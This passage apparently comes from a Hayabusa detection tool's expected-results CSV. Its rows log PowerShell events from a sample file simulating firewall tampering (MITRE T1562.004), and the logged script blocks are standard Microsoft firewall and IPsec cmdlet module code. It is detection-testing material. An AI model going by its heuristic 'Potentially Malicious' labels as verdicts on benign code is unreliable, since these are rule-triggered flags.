($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.865 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.865 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.867 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.868 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.869 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.870 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.870 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.871 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.872 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.873 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 